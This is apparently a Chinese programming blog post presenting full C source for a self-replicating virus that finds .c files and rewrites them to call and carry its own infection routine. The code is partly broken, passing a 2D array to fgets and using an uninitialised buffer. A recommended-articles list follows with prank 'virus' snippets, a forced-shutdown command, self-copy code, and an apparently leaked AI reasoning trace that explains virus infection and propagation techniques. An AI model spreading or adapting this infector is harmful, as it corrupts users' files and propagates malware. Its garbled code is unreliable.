C写的伪病毒

最新推荐文章于 2024-03-12 09:56:23 发布
最新推荐文章于 2024-03-12 09:56:23 发布
阅读量389 收藏
点赞数
分类专栏: 笔记 文章标签: c buffer null include struct file
 

#include<stdio.h>
#include <dir.h> 
int main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",&ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
    if(i>=50)
    {
fclose(in);
goto next;
    }
    p=fgets(buf,80,in);
    i++;
   }while(p!=NULL);
   fclose(in);
   out=fopen(ffblk.ff_name,"w+t");
   fputs("#include<stdio.h>\n",out);
   fputs("#include<dir.h>\n",out);
do
{
  if(strstr(buf[j],main)!=NULL)
  {
   for(;j<i-1;j++)
   if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL)
   fputs(buf[j],out);
   else
   {
    if(flag==0)
    {
flag=1;
fputs("virus();\n",out);
    }
    fputs(buf[j],out);
   }
}
else if((strstr(buf[j],include[0])==NULL)
&&(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(j<i-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
  if(strstr(buffer,virus)==NULL)
  fputs(buffer,out);
  else
  {
                fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
        fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);

fclose(read);
fclose(out);
printf("\nYour c program  %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(&ffblk);
}
return 0;
}

用Python做一个假病毒
python_7832的博客
05-27 1017
result = tkinter.messagebox.askokcancel(title="window", message="发现病毒是否删除")a = tkinter.messagebox.askokcancel(title="病毒", message="是否删除我")tkinter.messagebox.showinfo(title="病毒", message="玩个游戏吧")tkinter.messagebox.showinfo(title="病毒", message="我想个数字你猜")
病毒代码注释
jnx5945的博客
03-18 478
progame V: //将v传给编辑器 {goto main; == //无条件跳转到main处后执行程序== 1234567; //定义一个值 subroutine infect-executable; == //用于感染某个程序== {loop; == //定义一个值== file:=get-random-excutab...
c语言能编程病毒吗,这个人用C语言了个简单的“病毒”!
weixin_29959549的博客
05-20 1057
对于病毒,我们都深恶痛绝。俗话说“知己知彼,方能百战百胜”。为了避免病毒的伤害,我们有必要研究一下病毒只怎么来的。在网络上看到一个帖子,吧主称为了编程研究,自己用一个简单并且没有伤害性的C语言,来病毒一下。这个吧主称,自我复制是病毒主要的特点,下面为大家介绍的是附加式病毒。这种病毒主要是改、增加正常文件,以此实现自我复制这个目的。下面这段C语言实现的过程,主要包括六个部分:第一:主程序对病毒功...
病毒代码添加代码注释
qq_46484745的博客
03-20 336
progame V:=      /将v传给编辑器 {goto main;     /无条件跳转到main处后执行程序 1234567;              &nb...
c语言制作电脑病毒原理,用C语言编的简单病毒
weixin_39931390的博客
05-22 5263
此实验代码请务必在Vmware中执行,不要在真机上进行实验,否则会很麻烦。本实验的设计是基于C语言的恶意代码,其执行过程如下:1. 首次执行该病毒时,如果检测到注册表的任务管理器未禁用,则该病毒依次执行以下功能:创建一个启动项,将文件复制到系统目录路径下,并将其用作自动启动路径;禁用任务管理器;禁用注册表编辑器;获取图片并修改桌面背景(重新引导生效);修改注册表以将用户键盘输入阻止为1(重新启动生...
c语言运行显示病毒,常见C语言病毒
weixin_39862669的博客
05-19 1246
#include#include#include#include#includevoid copyfile(char *infile, char *outfile){FILE*in,*out;in =fopen(infile,"r");out =fopen(outfile,"w");while(!feof(in)){fputc(fgetc(in),out);}fclose(in);fclose(o...
南京邮电大学恶意代码——实验:Pe病毒
weixin_42559271的博客
04-25 1955
前言 修改PE文件一般有两种思路。 第一种是通过编程语言来修改,这种方式的Visual Studio的Windows.h头文件里面有完全的PE相关管理结构的完整定义,通过编程来修改比较烦,但是优点是可以自动化进行,并且不需要去找相关的工具; 第二种方法是通过一些二进制工具来进行修改,这种方式是交互式的,能够直观的感受到整个过程,缺点是需要熟悉相关工具的UI使用方式,而且修改大量方式的时候市面上的这些工具一般都不提供编程接口; 因为本次实验仅仅是一个探索,所以就采用第二种方式。 需要的工具 本次实验用到的
计算机病毒分析流程图,电脑病毒分析-熊猫烧香病毒分析.pdf
weixin_34552424的博客
07-20 755
编程,语言,java,web,程序,软件,C++,C#,互联网,网络,安全,电脑,病毒熊猫病毒分析及解决方案C变种版本【工 具】:Olydbg1.1、IDA5.0【任 务】:病毒分析以及解决方案【操作平台】:Windows2003server【作 者】:LoveBoom[DFCG][FCG][CUG]【链 接】:N/A【简要说明】:"离开党和人民一年"、荒废了一年,2006年可所谓沉迷于游...
C病毒,自我启动复制
Aaron_xyt的专栏
05-14 1522
#include #include #include #include #include /* copy outfile to infile */ void copyfile(char *infile, char *outfile) { FILE *in,*out; in = fopen(infile,"r"); out = f
病毒代码添加注释
m0_46491427的博客
03-20 496
progame V:= /将v传给编辑器 {goto /无条件跳转到main处后执行程序1234567; /定义一个值 subroutine infect-executable;= /用于感染某个程序 {loop;/定义一个值 file:=get-random-excutable-file; /随机获取文件 if(first-li...
给一段简单的病毒代码添加注释
Little_student__的博客
03-19 403
给一段简单的病毒代码添加注释 progame V:= {goto main; 1234567; /子程序感染,可执行文件 subroutine infect-executable;= /感染某个程序 {loop; /定义一个值 file:=get-random-excutable-file; /随机获取文件 if(first-line-of-file=1234567) goto...
如何通过Python代码实现病毒,去捉弄一下你的小伙伴
2301_81807150的博客
02-29 1662
3.最后,创建一个def Start()函数去将第二步创建好的一个窗口再一个for in range循 环,就实现了电脑中病毒报错弹窗的效果。3.最后,创建一个def Start()函数去将第二步创建好的一个窗口再一个for in range循 环,就实现了电脑中病毒报错弹窗的效果。:random模块中的seed函数可以设置随机数生成器的种子,通过设置相同的种子可以获得相同的随机数序列,这在调试和复现随机性结果时非常有用。
python简单的病毒编程代码,如何用python做恶搞病毒
S1112_的博客
03-12 562
这是一个简易的欺骗病毒,打开后好像一个下载程序,在下载完之后就强制关机,但其中有3次break的补救机会(即直接结束结束),其关机原理是命令行指令“shutdown -s -t 60”(即六十秒后关机)话不多说,上代码!
简单整蛊室友,只需几行bat病毒代码
热门推荐
f32556b6edcdc80c的博客
10-07 4万+
整蛊室友,马上搞定。
vbs 脚本2
weixin_30511039的博客
04-06 5705
一些很恶作剧的vbs程序代码 作者: 字体:[增加减小] 类型:转载 时间:2013-01-16我要评论 恶作剧的vbs代码,这里提供的都是一些死循环或导致系统死机的vbs对机器没坏处,最多关机重启一下就可以了,将下面的任意一段代码保存为*.vbs即可 操作方法:把代码保存为*.VBS运行即可经本人亲自测试 不会出大问题的,一般都是利用无限循环,不是死循环,...
用Python一个假的病毒炸弹(整蛊)
m0_53660048的博客
10-11 5593
一个Python整蛊小程序,病毒炸弹
C语言的简单病毒程序
Mobidogs Blog
03-04 5441
<!--google_ad_client = "pub-3555979289815451";google_ad_width = 468;google_ad_height = 60;google_ad_format = "468x60_as";google_ad_type = "image";//2007-03-07: devx.blog.com.cngoogle_ad_
病毒代码
最新发布
06-01
<think>嗯,用户现在想了解病毒代码的实现原理和相关案例。我需要根据之前的引用内容来组织回答。首先,用户提到的引用里提到了用高级语言编病毒的优缺点,比如C语言病毒的大小问题,还有代码病毒的工作机制。还有脚本病毒的例子,比如VB脚本病毒和蠕虫病毒的特性。用户可能想知道病毒的基本原理,比如传播机制、感染方式、触发条件等。需要分点解释,结构要清晰。然后案例部分,可以举重病毒、代码病毒和脚本病毒的例子,每个例子要具体说明它们是怎么工作的,比如代码病毒如何感染C文件,添加头文件和调用函数。 还要注意用户提到的引用中的关键点,比如高级语言病毒的弊端,代码病毒的高效性,以及脚本病毒利用COM组件等。需要确保回答准确引用这些信息,并在末尾添加引用标识。另外,用户可能需要相关问题,所以得生成几个相关的问题,比如不同语言的病毒差异、防御方法、历史案例等。要确保用中文回答,LaTeX公式正确,行内公式用$...$,独立公式用$$...$$。不过病毒代码相关的部分可能公式不多,但如果有数学表达式的话要注意格式。比如在解释加密算法时可能会有,但根据引用内容,可能暂时不需要,所以可能可以省略公式部分。还需要检查是否有技术错误,比如代码病毒的工作流程是否描述正确,是否混淆了不同类型的病毒。确保引用[1]和[2]的信息准确融入回答中,比如重病毒会破坏文件,脚本病毒利用文件名欺骗等。 最后,生成的问题要围绕病毒的实现原理、案例、防御措施等,帮助用户深入探索。可能需要列出三个问题,比如不同编程语言的病毒差异、如何防御脚本病毒、历史著名病毒案例等。</think>### 病毒代码实现原理分析 #### 一、病毒代码的基本特性 根据技术资料,病毒代码的核心机制包含以下步骤[^1]: 1. **文件搜索**:寻找特定类型的目标文件(如可执行文件、源代码文件等) 2. **感染入**:将病毒本体植入目标文件 3. **触发检测**:检查预设条件(如时间、系统状态等) 4. **行为执行**:返回宿主程序或触发破坏性操作 #### 二、典型病毒实现案例 1. **重病毒(Overwriting Virus)** - **原理**:直接覆盖目标文件内容导致永久性损坏 - **缺陷**:文件损毁易被发现,需通过备份恢复[^1] - **代码示例**: ```c void infect_file(char *filename) { overwrite(filename, virus_code); // 覆盖目标文件 if (trigger_condition()) { destructive_action(); // 触发破坏行为 } } ``` 2. **代码病毒(Source-Code Virus)** - **感染流程**: 1. 扫描`.c`扩展名的C语言源文件 2. 插入包含病毒的头文件`#include "virus.h"` 3. 在`main()`函数中添加病毒调用`virus_init()`[^1] - **优势**:通过编译过程实现隐蔽传播 3. **脚本病毒(如VB蠕虫病毒)** - **技术特征**: - 使用`.vbs`脚本文件作为载体 - 通过文件名欺骗(如`*.htm.vbs`)诱导用户执行 - 调用COM+组件增强破坏能力[^2] - **示例传播代码**: ```vbs Set fso = CreateObject("Scripting.FileSystemObject") fso.CopyFile WScript.ScriptFullName, "C:\target.vbs" ``` #### 三、病毒设计关键技术 1. **内存驻留技术**: - 高级语言编病毒常因内存占用过大易被察觉(通常超过10KB)[^1] 2. **传播优化方法**: - 代码压缩(如PE压缩壳技术) - 多态引擎(Polymorphic Engine)实现代码变异
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值